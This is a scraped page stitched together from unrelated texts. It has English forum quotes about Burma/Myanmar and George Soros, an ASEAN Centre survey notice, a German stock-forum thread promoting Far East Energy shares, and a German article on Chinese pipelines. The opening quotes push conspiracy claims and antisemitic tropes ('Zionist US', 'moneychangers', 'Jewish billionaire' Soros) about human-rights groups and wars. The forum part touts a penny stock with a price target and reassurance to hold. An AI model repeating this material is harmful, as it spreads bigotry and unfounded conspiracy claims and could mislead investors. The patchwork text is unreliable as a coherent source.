
“distraction from the quagmire in ME and Iran. Whenever these guys talk about human rights in some country its almost always a distraction and psychological preparation of masses for the next war

“…And by getting rid of the current regime, Burma will become integrated into the international banking system, which will keep the Burmese enslaved.

"International oil and international banking. QRS suspects that the closer you look at these two, the more they are revealed to be one and the same monster. “

“In the drug trade, it's all about monopoly.”

“Burma/Myanmar has very large reserves of Gas that China wants and the Zionist US doesn't want it to have for cheap - and so far they've resisted financial infiltration by the moneychangers. Both these factors among others (Drugs, Oil) are good enough reasons for the zionized US government to get embroiled. There is one thing that we can all agree on, however - it's NOT a humanitarian cause. The fascination with Burma/Myanmar is about power, greed, and most importantly CONTROL.”

“ If Move On (and their new front group Avaaz) were an anti-war group they would have a petition to stop the US/Ethiopian occupation of south Somalia - where this Washington Post article admits the Ethiopian (US-proxy) troops have killed 1000 people in "recent weeks" - instead of having an imperialist pro-war petition against Myanmar where all they can come up with is that the the Myanmar government allegedly shot 9 demonstrators. The "israeli" zionists, funded by our taxes, kill more Palestinians than that every week in Gaza. I don't see any petitions for Palestine from Move On.

Note that U. S. assistant secretary of state Jendayi Frazer (who is mentioned in this article as having gone to Mogadishu Somalia recently to support the phony puppet government that the Ethiopians/Americans have set up there to try to justify the occupation) also was the Bush administration speaker at the pro-war rally against Sudan in April 2005 in Washington DC. Move On, and Jewish billionaire George Soros's other groups, have played a large role in inciting war against Sudan as well.

The anti-Sudan and anti-Myanmar propaganda are both tactics in imperialist economic warfare against China.”

"China has a trade surpus meaning they have amassed a fortune of currency from selling americans every diposable consumer item thier credit cards can handle. New York billionares want all that money and control over all the chineses currency, trade and economic activity the same way they control the US currency thru the Federal Reserve bank Corporation. The threats to boycott the olympics are just a extortion shake down to extract hugh amounts of cash payoffs in the form of chineses investments in New York money peoples private equity firm IPOs such as Carlyle Group."

With three countries -- Thailand, Cambodia, and Vietnam -- vying for the off-shore oil booty in seas where maritime borders are contested, the Cheney gangster cartel hopes to achieve a dominant position to grab that oil. (Burma is right next door. On September 16, 2006, the USA supported a military coup that overthrew Thailand's democratically elected government. Ralph Boyce -- U. S. ambassador to Thailand -- now sports a yellow tie to show his support for the royalist-backed coup, since yellow is the color of the monarchy.”

"Burma is huge in the heroin trade Burma and the Golden Triangle was the largest supplier of heroin for a long time. Now it's Afghanistan and Mexico is coming on fast. In the drug trade, it's all about monopoly. Oil will always be 2nd to the drug trade over all in profits. Just so happens oil is high at the moment."

Burma in the news at the moment is about DRUGS! Oil, Drugs, Banking, or Gas. I suspect it's a little of all.

Here is the US Imperialists/Think tank blue print and talking points for the war on china. http://www. steel. org/AM/Template. cfm? Section=Events1&TEMPLATE=/CM/Conten

Stephen Zunes of the International Center for Nonviolent Conflict and Tikkun does damage control after getting busted fellow traveling with the CIA, Pentagon, DARPA, The US State Department and The US Air Force. http://www. greenleft. org. au/2007/727/37727

the vital role played by soft power in promoting the hegemony of transnational capitalism: “soft” strategies that were pioneered by liberal foundations like the Ford and Rockefeller foundations, which worked hand-in-hand with the CIA to create civil society front groups and co-opt progressive activists all over the world http://www. greenleft. org. au/2007/725/37638

A Meta-Group Managing Drugs, Violence, and the State http://oraclesyndicate. twoday. net/stories/2635968/ In 2003-2004, Filin and Likhvintsev worked on the Georgian project, financed by KBR Halliburton, apparently, with the approval of the CIA. The project had the goal of weakening the competitors of Halliburton in the oil business and, in a broader context, of facilitating the geopolitical objectives of the United States in the Caucasus. The OPS man in Georgia is Audrius Butkevicius, former Lithuanian minister of defense, presently advisor to Badri Patarkatsishvili.

2003 and 2004 were the years of the two Georgian “Rose Revolutions,” in which Mikheil Saakashvili displaced Eduard Shevardnadze. A role was played by western foundations such as the Albert Einstein Institute, with which Butkevicius was allegedly associated.

re: the "imperial wizard" George Soros:

Under President Clinton, Human Rights Watch was the most influential pro-intervention lobby: its 'anti-atrocity crusade' helped drive the wars in ex-Yugoslavia. Mr. Soros established his first foundation, the Open Society Fund, in New York in 1979 and his first Eastern European foundation in Hungary in 1984. He now funds a network of foundations that operate in thirty-one countries throughout Central and Eastern Europe, and the former Soviet Union, as well as southern Africa, Haiti, Guatemala, Mongolia and the United States. These foundations are dedicated to building and maintaining the infrastructure and institutions of an open society. Mr. Soros has also founded other major institutions, such as the Central European University and the International Science Foundation. In 1994, the foundations in the network spent a total of approximately $300 million; in 1995, $350 million; in 1996, $362 million; and in 1997, $428 million. Giving for 1998 is expected to be maintained at that level.

HUMAN RIGHTS WATCH AMNESTY INTERNATIONAL HUMAN RIGHTS FIRST http://www. kominf. pp. fi/7extra. html Human Rights Watch is the Arm of George Soros and a propaganda tool of the CIA. So if they weigh in on the events in Palestine they are doing so for political advantage to the US and client state Israel. HRW is wealthy and its tentacles reach out across the globe. HRW has opposed the sovereignty of Peoples Republic of China. Roth prosecutes the campaign opposing the right of the Chinese government to rule in Tibet and Xinchiang province. .

The new Gladio in action: Ukrainian postmodern coup completes testing of new template By Jonathan Mowat http://onlinejournal. com/Special_Reports/031905Mowat-1/031905mowat-1.htm

"Gene Sharp started out the seminar by saying 'Strategic nonviolent struggle is all about political power.' And I thought, 'Boy is this guy speaking my language,' that is what armed struggle is about."—Col. Robert Helvey

In November 1989, Case Western Reserve in Cleveland, Ohio, under the aegis of that university's "Program for Social Innovations in Global Management," began a series of conferences to review progress towards that strategic objective, which was reported on in "Human Relations" in 1991. There, Dr. Howard Perlmutter, a professor of "Social Architecture'' at the Wharton School, and a follower of Dr. Emery, stressed that "rock video in Katmandu," was an appropriate image of how states with traditional cultures could be destabilized, thereby creating the possibility of a "global civilization." There are two requirements for such a transformation, he added, "building internationally committed networks of international and locally committed organizations,'' and "creating global events" through "the transformation of a local event into one having virtually instantaneous international implications through mass-media.".

Col. Helvey reports, in a January 29, 2001, interview with film producer Steve York in Belgrade, that he first got involved in "strategic nonviolence" upon seeing the failure of military approaches to toppling dictators—especially in Myanmar, where he had been stationed as military attaché—and seeing the potential of Sharp's alternative approach. According to B. Raman, the former director of India's foreign intelligence agency, RAW, in a December 2001 paper published by his institute entitled, "The USA's National Endowment For Democracy (NED): An Update," Helvey "was an officer of the Defence Intelligence Agency of the Pentagon, who had served in Vietnam and, subsequently, as the US Defence Attache in Yangon, Myanmar (1983 to 85), during which he clandestinely organised the Myanmarese students to work behind Aung San Suu Kyi and in collaboration with Bo Mya's Karen insurgent group. He also trained in Hong Kong the student leaders from Beijing in mass demonstration techniques which they were to subsequently use in the Tiananmen Square incident of June 1989" and "is now believed to be acting as an adviser to the Falun Gong, the religious sect of China, in similar civil disobedience techniques." Col. Helvey nominally retired from the army in 1991, but had been working with Albert Einstein and Soros long before then.

A Civilian Revolution in Military Affairs The emphasis on the use of new communication technologies to rapidly deploy small groups, suggests what we are seeing is civilian application of Secretary Donald Rumsfeld's "Revolution in Military Affairs" doctrine, which depends on highly mobile small group deployments "enabled" by "real time" intelligence and communications. Squads of soldiers taking over city blocks with the aid of "intelligence helmet" video screens that give them an instantaneous overview of their environment, constitute the military side. Bands of youth converging on targeted intersections in constant dialogue on cell phones constitute the doctrine's civilian application.

This parallel should not be surprising since the US military and National Security Agency subsidized the development of the Internet, cellular phones, and software platforms. From their inception, these technologies were studied and experimented with in order to find the optimal use in a new kind of warfare. The "revolution" in warfare that such new instruments permit has been pushed to the extreme by several specialists in psychological warfare. Although these military utopians have been working in high places (for example the RAND Corporation) for a very long time, to a large extent they only took over some of the most important command structures of the US military apparatus with the victory of the neoconservatives in the Pentagon of Donald Rumsfeld.

The new techniques of warfare include the use of both lethal (violent) and nonlethal (nonviolent) tactics. Both ways are conducted using the same philosophy, infrastructure, and modus operandi. It is what is known as Cyberwar. For example, the tactic of swarming is a fundamental element in both violent and nonviolent forms of warfare.

International Center on Nonviolent Conflicts

The International Center on Nonviolent Conflicts has been heavily involved in the new Postmodern Coups, especially through its top figures, Dr. Peter Ackerman and Jack DuVall.

According to its website, the center "develops and encourages the use of civilian-based, nonmilitary strategies to establish and defend democracy and human rights worldwide." It "provides assistance in the training and deployment of field advisors, to deepen the conceptual knowledge and practical skills of applying nonviolent strategies in conflicts throughout the world where progress toward democracy and human rights is possible."

George Soros: Imperial Wizard by Heather Cottin Covert Action Quarterly info (at) covertactionquarterly. org December 9, 2003 George Soros, "humanitarian" is very worried about the decline in the world capitalist system and he wants to do something about it, now. He recently said: "I can already discern the makings of the final crisis. Indigenous political movements are likely to arise that will seek to expropriate the multinational corporations and recapture the 'national' wealth.".

George Soros: Prophet of an "Open Society" Karen Talbot 4 July 2003. http://globalresearch. ca/articles/TAL307A. html

Survey of Russia - ASEAN trade and economic relations

As part of the research on a "Strategy of Trade and Investment Cooperation for Russia - ASEAN Dialogue Partnership”, commissioned by the Ministry of Economic Development of the Russian Federation, the ASEAN Centre at the Moscow State University of Foreign Relations is conducting a survey of companies directly engaged in bilateral economic activities both in Russia and ASEAN member countries to obtain first-hand information on challenges and prospects of trade and economic exchanges. We invite you to complete the questionnaire. If you represent the Russian business community, the Russian version of the questionnaire is available here .

Copyright y copia; ASEAN Centre 2016, все права защищены.

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Danke im Voraus

Dann wollen wir mal mit dem Personal anfangen:

Michael R. McElwrath President and Chief Executive Officer, Director Mr. McElwrath, before joining Far East Energy, was Vice President of TMP/Hudson Global Resources, TMP is the parent company of Monster. com. He served as Acting Assistant Secretary of Energy in the first Bush Administration, charged with development of the nation’s coal, oil, and gas policies and with management of $2.1 Billion in programs including the Clean Coal Program, the National Oil and Gas Research Program, and the Strategic Petroleum Reserve. He was an International Negotiator and Policy Advisor in the Reagan administration. Upon leaving the Bush Administration he had stints as Director of the National Institute for Petroleum and Energy Research and Director of British Petroleum’s outsourced exploration and production lab for the Americas. In addition, Mr. McElwrath has held a number of Senior Executive positions in the energy industry. Mr. McElwrath holds a J. D. from the University of Texas School of Law, as well as a B. A. Honors Program.

Bruce N. Huff Chief Financial Officer Mr. Huff brings more than 30 years of financial experience with emphasis on domestic and international oil and gas exploration /production. Mr. Huff spent 13 years with Harken Energy Corporation, holding the positions of President and Chief Operating Officer and other capacities including Senior Vice President, Chief Financial Officer and Director. In his industry experience, Mr. Huff has been responsible for a wide range of functions including strategic planning, financial, legal, information technology and investor relations. He has experience with acquisitions and divestitures, capital financings with common and preferred stock, U. S. and European convertibles and bank-project financing. Mr. Huff’s background also includes 20 years in public accounting, including positions with an international accounting firm in Dallas, Texas where he served in the audit department serving numerous public companies and as President of a local accounting firm in Abilene, Texas servicing oil and gas, banking, and other industries. Mr. Huff has co-authored several books and published articles on auditing small businesses and quality controls as well as training courses for those services. He graduated with a BS in Accounting from Abilene Christian University. Mr. Huff is a CPA and has been a member of the American Institute of CPAs, the Financial Executives Institute and the Independent Producers Association of America. The Texas Society of Certified Public Accountants named Mr. Huff the Outstanding Young CPA for Texas in 1983.

Garry Ward Senior Vice President, Engineering Mr. Ward’s career spans 23 years in the petroleum industry, where his primary focus has been on the evaluation of oil and gas properties throughout the United States. He has been involved in the evaluation of coalbed methane prospects, primarily in the San Juan and Powder River basins, since 1992. In addition, he has over 20 years’ experience in petroleum software development and has written numerous programs for use in the evaluation of oil and gas assets. Mr. Ward previously served as reservoir manager for 3TEC Energy and as Vice President of engineering and production for Floyd Oil Company. He holds a Master of Science degree in Petroleum Engineering from the University of Houston, is a registered professional engineer in the state of Texas and has been a member of the Society of Petroleum Engineers since 1978.

Alex Yang VP Exploration Dr. Yang is a well-known geologist, and is recognized as a preeminent CBM expert in China. He received his Ph. D in Geology from Texas A&M University and has 22 years of working experience in China’s energy industry and universities (teaching and research). He was among the pioneers in introducing CBM exploration and production to China, and assisted CUCBM in its early stages of formation. From 1993 to 2001, he worked as Chief Geologist and Senior Consultant for Amoco/Arco/BP CBM projects in the Ordos and Qinshui Basins in North China, and played a leading role in developing their projects and operations. Also, Dr. Yang has established personal/business relationships with numerous key people in the Chinese government and energy industry (CUCBM, PetroChina, Sinopec, China Univ. of Mining & Tech. and China National Administration of Coal Geology), which greatly benefits FEEC’s project execution and business development in China.

Michael R. McElwrath, President and CEO

John Mihm Chairman of the Board / Compensation Committee Chairman Mr. Mihm was the Senior VP of Technology and Project Development for Phillips Petroleum Company (later ConocoPhillips) until his retirement in February 2003. Mr. Mihm has 40 years of experience in the oil and gas industry. Mr. Mihm was involved in supplying technical support for the ConocoPhillips Shanxi project prior to its farmout to Far East Energy.

Thomas E. Williams Independent Director Mr. Williams is presently vice president of Maurer Technology, a drilling technology subsidiary of Noble Corporation. Williams held senior executive positions at the Department of Energy and the Department of Interior during the first Bush administration, following which he served as business development director at Houston’s Westport Technology Center, a leading upstream oil and gas research company that was acquired by Dresser Industries which later merged with Halliburton. Williams is co-founder and serves on the board of directors of Cementing Solutions, Inc. an oil and gas cementing and technology company based in Houston. Williams serves on a number of professional oil and gas organizations, associations and boards including the Independent Petroleum Association of America, the Petroleum Technology Transfer Council’s advisory group and national board, the Texas Independent Producers and Royalty Owners Association, the Society of Petroleum Engineers, the American Association of Drilling Engineers and others. He has authored more than 100 energy publications and articles during his 20 years in the industry.

Donald A. Juckett Independent Director, Nominating Committee Chairman Don Juckett, now consulting throughout the energy industry, retired from a long career at the Senior Executive Service level with the United States Department of Energy (DOE) in 2003. While there, he held posts as Director of the Office of Natural Gas and Petroleum Import and Export Activities, Director for Natural Gas and Petroleum Technology, and Acting Deputy Assistant Secretary for Natural Gas and Petroleum Technology. He conceived and organized the U. S./China Oil and Gas Industry Forum, a government/industry platform that enhanced China’s petroleum sector opening to outside investment. Prior to joining DOE, Mr. Juckett worked for Phillips Petroleum in exploration and production technical services and research. He has a Ph. D. in organic chemistry.

Randall Keys Independent Director, Audit Committee Chairman Mr. Keys is currently CFO of BPZ Energy, Inc. and a partner with Tatum CFO Partners LLP. Mr. Keys previously served as Chief Financial Officer of Transmeridian Exploration, Inc. a public oil and gas company with operations in Kazakhstan. Mr. Keys has over twenty years of financial management experience in the energy industry. From 1998 to 2001, he served as Chief Financial Officer of Core Laboratories N. V. an NYSE - listed global oilfield service company and one of its acquired entities. Prior to Core Labs, he served as CFO for 3DX Technologies, Inc. a NASDAQ - listed oil and gas exploration company, Treasurer for Norcen Explorer, Inc. and in progressive financial management roles at Santa Fe Energy Resources and one of its predecessors, Adobe Resources. Keys began his career with the public accounting firm of KPMG Peat Marwick and is a Texas CPA.

Timothy Whyte Independent Director Mr. Whyte is an investment manager with Sofaer Capital Inc. based in London. Mr. Whyte serves as an independent director and representative for an investor group in a $10.25 million private placement with Far East Energy closed on December 21, 2004. Mr. Whyte has an extensive investment background and a wide range of corporate finance experience.

Don Gunther Mr. Gunther currently sits on the Board of Directors for Williams Energy Partners, (NYSE:WEG), which is principally owned by Williams Companies, Inc. (NYSE:WMB). Mr. Gunther has formerly served as Vice Chairman for the Bechtel Group of companies, served on Bechtel's Executive Committee, and served on Bechtel's Board of Directors. Mr. Gunther was formerly President of Bechtel Petroleum -- Chemical and Industrial Company, and President of Europe, Africa, Middle East, and Southwest Asia regions.

Professor Wang Wenqian Professor Wang has 40 years of experience in mineral processing, specializing in coal and minerals in China with a specific focus on Yunnan Province. Professor Wang was a research fellow at the University of British Columbia in the Mineral Processing Department from 1983 to 1989. He has served as Vice Director of the Kunming Metallurgical Research Institute in Kunming, Yunnan Province and currently consults to the Institute on a wide array of projects.

Dr. Laxminarayana (Laxmi) Chikatamarla Dr. Laxminarayana (Laxmi) Chikatamarla has more than 21 years of experience in technology, management, policy planning, and evaluation of coal deposits and coalbed methane resources for exploitation, development and construction of coal projects and coalbed methane research. He is presently working as a Post Doctoral Research Fellow on ‘Acid Gas Sequestration’ project with Professor Marc Bustin at the University of British Columbia (UBC), Vancouver, Canada.

Dr. Chikatamarla holds a B. S. in Mining Engineering, post graduate diploma in computer applications, M. S. in Rock Mechanics (engineering geology) from the Indian Institute of Technology, Delhi, India and a Ph. D. in Geology specializing in Coalbed Methane from James Cook University, Townsville, Australia. He has presented several papers in national and international conferences and has published articles about coalbed methane in international journals.

Adam Parkin Mr. Parkin has over 25 years of experience in international finance and investment. He has served as director and fund manager with leading British institutions such as American Express Bank, Foreign & Colonial, Govett and Edmund de Rothschild. Mr. Parkin was trained as an economist; he holds Master of Philosophy degree from the University of Oxford and a B. A. with honors from the University of Warwick.

und dann gehts auch schon geich weiter, mit dem Projekten:

Key Facts The Shanxi project in full development could sustain an estimated 3,000 horizontal gas wells, giving it the potential to become one of the largest CBM projects in the world. FAR EAST ENERGY’S PROJECTS

Through its coalbed methane (CBM) projects in China, Far East Energy can exploit total gas-in-place estimated to be 18.3 to 24.9 trillion cubic feet (Tcf). By using an internal estimated recovery rate of 50%, recoverable CBM resources are potentially 9.2 Tcf to 12.5 Tcf (FEEC’s share is 4.8 Tcf to 6.9 Tcf depending upon CUCBM and ConocoPhillips participation).

Far East’s partners are ConocoPhillips and China United Coalbed Methane Company (China United). China United is China’s leading coalbed methane company.

The FEEC properties are world class in size and potential. The Far East projects potentially contain recoverable CBM resources of 9.20 Tcf to 12.5 Tcf.

• Shanxi 6.55 – 9.8 TCF of recoverable CBM resources • Enhong 1.10 TCF of recoverable CBM resources • Laochang 1.55 TCF of recoverable CBM resources

ConocoPhillips has extensive and encouraging information on the Shanxi project. Enhong and Laochang, Far East Energy’s other CBM projects have had extensive coal exploration with drill holes mapping out two world-class CBM prospects. Between these two projects, 1,561 drill holes have been completed, 30 technical reports written, 21 core analyses completed and over 300 other reports on gas concentrations.

The bottom line from a technical and economic viewpoint on these three properties is very encouraging:

Shanxi Project – Far East partnering with ConocoPhillips and China United

• 1,057,638 acres • Approximately 20 billion tons of coal reserves • Estimated 13.1 to 19.6 trillion cu. ft. of total gas-in-place, with potentially 6.55 to 9.8 Tcf of recoverable CBM resources • 50%-65% recovery possible • 60 feet of total coalbed thickness • Four seams average 9 feet thick each • 40% - 70% interest potential for FEEC

Internal ConocoPhillips documents state the "coal was well cleated and coal samples have high gas contents."

The Shanxi project in full development could sustain an estimated 3000 horizontal gas wells. It could be one of the largest CBM projects in the world.

Far East could be a 66.5% owner of this project if ConocoPhillips decides to participate only on an overriding royalty basis. Far East would retain a 40% interest if ConocoPhillips elects to participate, but would only have to put up 40% of the development costs.

Core recovery tests by ConocoPhillips indicate high levels of cleating (a very good sign) and friability (brittle and fragmented coal) and the tests also show good gas content.

Enhong & Laochang – Far East partnering with China United

• 264,863 acres of property • Estimated 5.3 trillion cu. ft. of total gas-in-place with potentially 2.65 Tcf of recoverable CBM resources • 50%-65% recovery possible • 11-13 mineable coal beds • 55-62 feet thickness of coal beds • 60% interest for FEEC

If all goes well, Far East could place hundreds of horizontal gas wells on each of the two blocks. Tests show the amount of gas per ton of coal is 200-500 cu. ft.

All Far East Energy’s projects appear to have excellent potential if the permeability is favorable. The Far East technical team feels relatively confident that this will be the case considering the extensive information already available regarding the fracturing and cleat system of the coal beds. Also, with over 80% of Far East’s coal seams less than 1,500 meters from surface, well completion costs should be reasonable.

World Class CBM Basins and Far East Energy Projects

Comparing Far East Energy’s projects to some of the major CBM producing areas in the U. S. shows favorable economic potential of Far East’s projects based on gas content per ton and size.

The Yunnan Coal Geological Bureau and ConocoPhillips have accumulated substantial data addressing three of the four most important factors for successful CBM production in the Far East projects: size of the coal deposit, gas content and thickness of the coal seams are all favorable. For the fourth factor, permeability, the technical information and preliminary tests are uncertain but appear to be somewhat tight.

Far East plans to use horizontal drilling technology ("HDT") to enhance the value of its properties in China. HDT has been shown to have a positive impact on CBM development in the United States, particularly in Arkoma and Appalachia. The advantages of HDT are in the ability to stay in the desired zone, control over the direction of the wellbore, limited fluid invasion in the formation, less surface facilities, well productivity exceeding that of vertical well capacity, ability to add additional zones with confidence and less formation damage due to less pressure drop. Although the cost of a horizontal well is expected to exceed the cost of a vertical well, Far East believes that the overall benefits are worth the higher cost per well.

Hier nochmal was von Midas Resarch zu der Aktie:

Für alle die noch nicht Wissen um vieviel Geld es sich drehen kann.

Das mittelfristig Kursziel von Midas 10,51 EUR fest.

und schon gehts weiter mit dem Gesamtchart um einmal zu Vermitteln was passieren kann:

Beachtet mal das Volumen der letzten Tage, und behaltet im Hinterkopf das die Shortis bereits hier Agieren.


Interpretation: Üblicherweise gilt ein Wertpapier als überverkauft, wenn der OBOS unter 30% liegt. Umgekehrt ist er übergekauft, wenn ein Wert von über 70% berechnet wird. Man kann davon ausgehen, dass ein überverkaufter Wert wieder zu einer normalen Bewertung findet, also im Kurs steigen muss, während ein überkaufter Titel keine weiteren Kurssteigerungen verspricht. Befindet sich der OBOS im überkauften Bereich, bedeutet dies, dass dem Markt das Kapital fehlt, um den Kurs noch höher zu treiben. Im entgegengesetztem Fall ist zu vermuten, dass in einen überverkauften Markt wieder Geld investiert wird, was Kurssteigerungen zur Folge hätte.

An der OTC hier:

Kurslisten kann man auch bei Onvista kostenlos einsehen:

Also gebt acht was passiert und laßt euch nicht verunsichern.

Antwort auf Beitrag Nr. 22.566.732 von Frickhasserin am 13.07.06 14:59:05 @ Fricki bitte keine Sinnlos Postings hier, nur mit Infos und Quelle Posten

Die News seite von FEEC:

Far East Energy Announces Early Gas From First Horizontal Well

Houston, Texas – May 31, 2006 – Far East Energy Corporation (OTC BB:FEEC) announced that it has successfully achieved continuous gas flow in its first horizontal well in the Shouyang Block (FCC HZ01) of its project in Shanxi Province, China. At this early stage, the volume being produced is still small and the data obtained is not yet sufficient to be able to project peak gas production.

“We have attained a significant milestone with gas being desorbed from the coal,” stated Michael McElwrath, CEO and President of Far East Energy. “We have been very pleased with the dewatering of the HZ01 well because our initial well data evidences that the permeability of the #15 coal seam is much higher than we had anticipated. This high permeability and our desire to build a grouping of wells for production purposes are precisely why we located our third horizontal well, the FCC HZ03, in very close proximity to the HZ01.”

In coalbed methane production water must be produced before the pressure in the coal seam drops sufficiently to allow gas to release (desorb) and begin to flow. Water production from the HZ01 was higher than projected, but numerous water analyses and data from an observation well 400 feet from the HZ01 indicated that the produced water in the HZ01 was not from an extraneous source, and that the water level was being lowered, thus reducing the pressure in the coal seam. The higher water production is considered to be a positive indication of higher than anticipated permeability in the coal. Permeability measures the ease with which a gas or liquid can flow through rock or a similar medium, and the greater the permeability the easier it is for gas to flow through the coal.

“This information is very significant as it could suggest both a higher volume of total gas production over the economic life of the well, as well as a more rapid rate of production in the early years,” said Garry Ward, Senior Vice President Engineering.

As previously disclosed, in April 2006, Far East Energy began drilling its third horizontal well (FCC HZ03) in the Shouyang Block of its Shanxi Province project in China. The Company chose to drill the FCC HZ03 well adjacent to the HZ01 well because of the high permeability observed in the HZ01. This made the area around the HZ01 the preferred locale for the establishment of a large gas drainage pattern and gas production unit. The Company has now completed drilling a short-radius horizontal well with approximately 1075 feet in the targeted #15 seam, and Far East is preparing to begin dewatering. The belief that the high permeability in the coal seam makes significant production possible with shorter horizontal laterals, as well as difficulties encountered while drilling, led to the conclusion that the well should be completed to 1,075 feet.

The Shouyang Block is part of the 4,280 square kilometer (1,057,650 acres) coalbed methane (CBM) project in Shanxi Province that Far East holds under farmouts from ConocoPhillips. Including its 1073 square kilometer project in Yunnan Province, the coalbed methane concessions of Far East Energy contain a land mass slightly larger than the State of Delaware.

Based in Houston, Texas, with offices in Beijing, Kunming, and Taiyuan City, China, Far East Energy Corporation is focused on the acquisition of, and exploration for, coalbed methane through its agreements with ConocoPhillips and China United Coalbed Methane Company, Ltd. (CUCBM).

Statements contained in this press release that state the intentions, hopes, beliefs, anticipations, expectations or predictions of the future of Far East Energy Corporation and its management are forward-looking statements within the meaning of Section 27A of the Securities Act of 1993, as amended, and Section 21E of the Securities Exchange Act of 1934, as amended. It is important to note that any such forward-looking statements are not guarantees of future performance and involve a number of risks and uncertainties. Actual results could differ materially from those projected in such forward-looking statements. Factors that could cause actual results to differ materially from those projected in such forward-looking statements include: the preliminary nature of well data and commercial viability of the wells; risk and uncertainties associated with exploration, development and production of oil and gas; drilling and production risks; our lack of operating history; limited and potentially inadequate cash resources; expropriation and other risks associated with foreign operations; matters affecting the oil and gas industry generally; lack of availability of oil and gas field goods and services; environmental risks; changes in laws or regulations affecting our operations, as well as other risks described in our Annual Report on Form 10-K and subsequent filings with the Securities and Exchange Commission.

Beitrag Nr. 4 ( 22.575.160 )

Antwort auf Beitrag Nr. 22.566.732 von Frickhasserin am 13.07.06 14:59:05 Auch ältere Artikel Erwünscht oder TA´S

China greift nach Zentralasiens Öl und Gas Von John Chan 5. Januar 2001 aus dem Englischen (3. Januar 2001) Aufgrund der wachsenden Energienachfrage hat die chinesische Regierung den Zugang zu den großenteils unerschlossenen Reserven an Öl und Gas in Zentralasien zum vorrangigen Ziel ihrer Wirtschaftspolitik für die nächsten zwei Jahrzehnten erhoben. Pekings Pläne, China Zugang zu einer strategisch bedeutsamen Region zu verschaffen, sind ehrgeizig, kostspielig und haben bedeutende geopolitische Folgen. Die Energiepläne Chinas wurden auf dem Nationalen Volkskongress 2000 enthüllt. Schwerpunkt ist dabei der Bau eines 4.200 Kilometer langen Netzwerks von Öl - und Gaspipelines, das von Chinas westlicher Provinz Singkiang bis zur Ostküstenmetropole Schanghai verlaufen soll.

Das erste Stadium des Projekts ist der Bau von zwei Gaspipelines von Feldern in der Provinz Sichuan zur zentralen Industriestadt Wuhan und dann im Jahr 2002 nach Schanghai. Gasfelder in der Provinz Shaanxi werden an diese Pipelines angeschlossen werden. Öl und Gas von Becken in den Provinzen Qinghai und Singkiang, einschließlich des größeren Tarimbeckens, sollen bis 2005 angeschlossen werden. Wenn es einmal abgeschlossen ist - die geschätzten Kosten liegen bei über 30 Milliarden DM - wird das Energieprojekt in der Lage sein, 25 Milliarden Kubikmeter Gas und 25 Millionen Tonnen Öl pro Jahr in die Industrieregionen rund um Schanghai zu liefern. Zusätzlich zum Pipelinenetzwerk werden moderne Raffinerien und Kraftwerke an strategischen Orten in ganz China gebaut.

Singkiang, wo geschätzte Ölreserven von 20,9 Milliarden Tonnen und Erdgasreserven von 10,3 Billionen Kubikmeter lagern sollen, soll zu Chinas zweitgrößter Öl produzierender Region nach dem Nordosten des Landes entwickelt werden. Um seine Kontrolle zu festigen, setzt Peking zum einen auf die erbarmungslose Unterdrückung einer separatistischen Bewegung - die Provinz Singkiang ist überwiegend von Uiguren, einer zumeist moslemischen, turksprachigen Volksgruppe bewohnt - und zum anderen auf die rasche Industrialisierung der ärmeren westlichen Provinzen des Landes.

Der Bau des Pipelinenetzwerks entlang von Chinas Westgrenzen unter der Kontrolle der China National Petroleum Corporation (CNPC) und anderer großer chinesischer Energieunternehmen eröffnet zudem die Möglichkeit, die großen Energiereserven der früheren zentralasiatischen Sowjetrepubliken zu erschließen.

1997 erwarb die CNPC das Recht auf zwei möglicherweise lukrative Ölfelder in Kasachstan und warf dabei amerikanische und europäische Ölkonzerne aus dem Rennen. Im Austausch für die Bohrrechte ist die CNPC verpflichtet, Pipelines nach Singkiang zu bauen, um damit den Export von bis zu 50 Millionen Tonnen kasachischen Öls pro Jahr nach China zu ermöglichen. Außerdem sind Machbarkeitsstudien über den möglichen Bau einer 3000 km langen Gaspipeline von Turkmenistan nach Singkiang im Gange.

Theoretisch könnten Öl - und Gaspipelines von Turkmenistan und Kasachstan an die Pipelinenetzwerke sowohl Russlands als auch des Iran angeschlossen werden. Dieses Modell ist als die "Panasiatische globale Energiebrücke" bezeichnet worden - ein eurasisches Netzwerk von Pipelines, die Energieressourcen des Nahen Ostens, Zentralasiens und Russlands bis an Chinas Pazifikküsten verbinden würden.

Zunehmende ausländische Investitionen in Chinas Energiesektor

Zugrunde liegt dem Pipelineprojekt und der langfristigen Orientierung auf das Öl und Gas Zentralasiens der exponentiell zunehmende Energieverbrauch Chinas. Obwohl es der fünftgrößte Ölproduzent der Welt ist, hat sein Wirtschaftswachstum China seit 1993 in einen Nettoimporteur von Öl verwandelt. Im Jahr 2000 hat China bereits 65,5 Millionen Tonnen Öl importiert, hauptsächlich aus dem Nahen Osten, was gegenüber 1999 einen Anstieg von 97 Prozent bedeutet.

Nachdem sich die chinesische Wirtschaft in den neunziger Jahren mehr als verdoppelt hat, wird sie sich in diesem Jahrzehnt Prognosen zufolge erneut verdoppeln. Als Ergebnis werden die Importe sich von 20 Prozent des Ölverbrauchs auf 40 Prozent im Jahr 2010 erhöhen. Der Energieverbrauch der Industrie - 70 Prozent des gesamten Verbrauchs - ist dieses Jahr um 10 Prozent gewachsen. Der private Verbrauch wächst ebenfalls um 10 bis 14 Prozent pro Jahr. Nach konservativen Schätzungen wird der Anteil der Stadtbevölkerung von 20 auf mindestens 40 Prozent der 1,3 Milliarden Einwohner des Landes ansteigen. Mehr als 520 Millionen Menschen werden, v. a. an der Ostküste, in dicht besiedelten Städten leben und Elektrizität, Heizung und Transport brauchen.

Da Peking nicht in der Lage ist, die notwendige Infrastruktur zu finanzieren, hat es gezwungenermaßen den bisher isolierten chinesischen Energiesektor für ausländische Investitionen geöffnet. Große Summen von Kapital werden benötigt, nicht nur für die viele Milliarden teuren Pipelines, sondern auch zur Modernisierung technisch veralteter Raffinerien und zur Entwicklung von Netzwerken. Im Juli hat die chinesische Regierung bekannt gegeben, dass in verschiedenen mit der Ost-West-Pipeline verbundenen Joint Venture-Projekten ausländische Mehrheitsbeteiligungen zugelassen würden. Chinas zwei größte staatseigene Energieunternehmen haben Tochterfirmen an der Wall Street notieren lassen, um die für Ausbau und Umstrukturierung notwendigen Milliarden aufzubringen.

